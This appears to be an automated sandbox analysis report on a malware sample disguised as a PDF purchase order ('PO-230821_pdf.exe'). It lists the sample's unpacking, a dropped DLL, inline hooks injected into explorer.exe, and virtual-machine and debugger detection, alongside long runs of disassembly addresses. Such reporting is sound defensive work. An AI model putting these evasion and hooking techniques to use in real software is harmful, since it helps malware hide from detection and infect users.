Source:	Binary string: control.pdbUGP source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Unpacked PE file: 2.2.PO-230821_pdf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_10002885 push ecx; ret	0_2_10002898
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00407948 push cs; iretd	2_2_00407949
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00419312 pushfd ; retf	2_2_0041931B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041D4F2 push eax; ret	2_2_0041D4F8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041D4FB push eax; ret	2_2_0041D562
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041D4A5 push eax; ret	2_2_0041D4F8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041D55C push eax; ret	2_2_0041D562
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00416508 push eax; retf	2_2_00416533
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_004076E0 push ebx; retf 8491h	2_2_00407759
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041CF13 push 8DDE865Dh; iretd	2_2_0041CF18
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00410FBC push ecx; ret	2_2_00410FBE
Source: C:\Windows\explorer.exe	Code function: 3_2_108319B5 push esp; retn 0000h	3_2_10831AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10831B02 push esp; retn 0000h	3_2_10831B03
Source: C:\Windows\explorer.exe	Code function: 3_2_10831B1E push esp; retn 0000h	3_2_10831B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_11399B1E push esp; retn 0000h	3_2_11399B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_11399B02 push esp; retn 0000h	3_2_11399B03
Source: C:\Windows\explorer.exe	Code function: 3_2_113999B5 push esp; retn 0000h	3_2_11399AE7

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_100050C0 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_100050C0

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEF

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_0-7629

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000B09904 second address: 0000000000B0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000B09B6E second address: 0000000000B09B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-13766

Source: C:\Windows\SysWOW64\control.exe TID: 6824	Thread sleep count: 49 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6824	Thread sleep time: -98000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-8117

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 870			Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

API coverage: 8.8 %

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_024507DA GetSystemInfo,

0_2_024507DA

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	API call chain: ExitProcess graph end node	graph_0-7063
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	API call chain: ExitProcess graph end node	graph_0-7284
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	API call chain: ExitProcess graph end node	graph_0-8119

Source: explorer.exe, 00000003.00000000.1105174160.000000000585F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000Q
Source: explorer.exe, 00000003.00000000.1122088983.0000000008798000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.1105174160.000000000585F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&11bd2db8&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ntAsync>
Source: explorer.exe, 00000003.00000002.3585733015.0000000004E10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&11BD2DB8&0&000000W
Source: explorer.exe, 00000003.00000000.1092924750.0000000001182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000{Q3
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841829187.000000000D6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2843668491.000000000D701000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1092924750.000000000123F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&11bd2db8&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1092924750.0000000001182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 00000003.00000003.3193378166.0000000004DB7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&11bd2db8&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1122088983.0000000008798000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&11bd2db8&0&000000
Source: explorer.exe, 00000003.00000002.3605338155.0000000008939000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_10003685 _memset,IsDebuggerPresent,

0_2_10003685

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

0_2_100050C0

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

0_2_100050C0

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_10001E8C GetProcessHeap,

0_2_10001E8C

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_0245005F mov eax, dword ptr fs:[00000030h]	0_2_0245005F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_0245017B mov eax, dword ptr fs:[00000030h]	0_2_0245017B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_02450109 mov eax, dword ptr fs:[00000030h]	0_2_02450109
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_0245013E mov eax, dword ptr fs:[00000030h]	0_2_0245013E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1C0B6 mov eax, dword ptr fs:[00000030h]	2_2_00A1C0B6
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]	2_2_00A190B8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]	2_2_00A190B8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]	2_2_00A190B8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]	2_2_00A190B8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3B090 mov eax, dword ptr fs:[00000030h]	2_2_00A3B090
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]	2_2_00A1B096
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]	2_2_00A1B096
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]	2_2_00A1B096
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]	2_2_00A1B096
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADF097 mov eax, dword ptr fs:[00000030h]	2_2_00ADF097
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A500E8 mov eax, dword ptr fs:[00000030h]	2_2_00A500E8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADF0FE mov eax, dword ptr fs:[00000030h]	2_2_00ADF0FE
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AE90FB mov eax, dword ptr fs:[00000030h]	2_2_00AE90FB
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A570F8 mov eax, dword ptr fs:[00000030h]	2_2_00A570F8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A570F8 mov eax, dword ptr fs:[00000030h]	2_2_00A570F8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5D0C0 mov eax, dword ptr fs:[00000030h]	2_2_00A5D0C0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5D0C0 mov ecx, dword ptr fs:[00000030h]	2_2_00A5D0C0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADD0C0 mov eax, dword ptr fs:[00000030h]	2_2_00ADD0C0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A250CD mov eax, dword ptr fs:[00000030h]	2_2_00A250CD
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]	2_2_00A450DF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AE803E mov eax, dword ptr fs:[00000030h]	2_2_00AE803E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AE803E mov eax, dword ptr fs:[00000030h]	2_2_00AE803E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A27032 mov eax, dword ptr fs:[00000030h]	2_2_00A27032
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]	2_2_00AB303A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]	2_2_00AB303A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]	2_2_00AB303A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]	2_2_00AB303A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A26034 mov eax, dword ptr fs:[00000030h]	2_2_00A26034
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A26034 mov eax, dword ptr fs:[00000030h]	2_2_00A26034
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AF5006 mov eax, dword ptr fs:[00000030h]	2_2_00AF5006
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A50014 mov eax, dword ptr fs:[00000030h]	2_2_00A50014
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21011 mov eax, dword ptr fs:[00000030h]	2_2_00A21011
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21011 mov eax, dword ptr fs:[00000030h]	2_2_00A21011
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A60075 mov eax, dword ptr fs:[00000030h]	2_2_00A60075
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1C050 mov eax, dword ptr fs:[00000030h]	2_2_00A1C050
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1A053 mov ecx, dword ptr fs:[00000030h]	2_2_00A1A053
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A7705A mov eax, dword ptr fs:[00000030h]	2_2_00A7705A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A7705A mov eax, dword ptr fs:[00000030h]	2_2_00A7705A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]	2_2_00A2A1A3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]	2_2_00A2A1A3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]	2_2_00A2A1A3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]	2_2_00A2A1A3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]	2_2_00A2A1A3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A291A5 mov eax, dword ptr fs:[00000030h]	2_2_00A291A5
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A291A5 mov eax, dword ptr fs:[00000030h]	2_2_00A291A5
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A181AB mov eax, dword ptr fs:[00000030h]	2_2_00A181AB
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A191B0 mov eax, dword ptr fs:[00000030h]	2_2_00A191B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A191B0 mov eax, dword ptr fs:[00000030h]	2_2_00A191B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A301B1 mov eax, dword ptr fs:[00000030h]	2_2_00A301B1
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A301B1 mov eax, dword ptr fs:[00000030h]	2_2_00A301B1
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A301B1 mov eax, dword ptr fs:[00000030h]	2_2_00A301B1
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A30180 mov eax, dword ptr fs:[00000030h]	2_2_00A30180
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A30180 mov eax, dword ptr fs:[00000030h]	2_2_00A30180
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AF3186 mov eax, dword ptr fs:[00000030h]	2_2_00AF3186
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5318E mov eax, dword ptr fs:[00000030h]	2_2_00A5318E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5318E mov eax, dword ptr fs:[00000030h]	2_2_00A5318E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5418B mov ecx, dword ptr fs:[00000030h]	2_2_00A5418B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5418B mov eax, dword ptr fs:[00000030h]	2_2_00A5418B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5418B mov eax, dword ptr fs:[00000030h]	2_2_00A5418B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5A1FB mov eax, dword ptr fs:[00000030h]	2_2_00A5A1FB
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5A1FB mov eax, dword ptr fs:[00000030h]	2_2_00A5A1FB
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5A1FB mov eax, dword ptr fs:[00000030h]	2_2_00A5A1FB
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1A1C0 mov eax, dword ptr fs:[00000030h]	2_2_00A1A1C0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F1C0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F1C0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F1C0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F1C0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADF1DA mov eax, dword ptr fs:[00000030h]	2_2_00ADF1DA
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A181DB mov eax, dword ptr fs:[00000030h]	2_2_00A181DB
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A26139 mov eax, dword ptr fs:[00000030h]	2_2_00A26139
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]	2_2_00AFB10C
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]	2_2_00AFB10C
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]	2_2_00AFB10C
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]	2_2_00AFB10C
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1A107 mov eax, dword ptr fs:[00000030h]	2_2_00A1A107
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1A107 mov eax, dword ptr fs:[00000030h]	2_2_00A1A107
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1A107 mov eax, dword ptr fs:[00000030h]	2_2_00A1A107
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAB104 mov eax, dword ptr fs:[00000030h]	2_2_00AAB104
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAB104 mov eax, dword ptr fs:[00000030h]	2_2_00AAB104
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AF3119 mov eax, dword ptr fs:[00000030h]	2_2_00AF3119
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AA0117 mov eax, dword ptr fs:[00000030h]	2_2_00AA0117
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AA0117 mov eax, dword ptr fs:[00000030h]	2_2_00AA0117
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AA0117 mov eax, dword ptr fs:[00000030h]	2_2_00AA0117
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A49164 mov eax, dword ptr fs:[00000030h]	2_2_00A49164
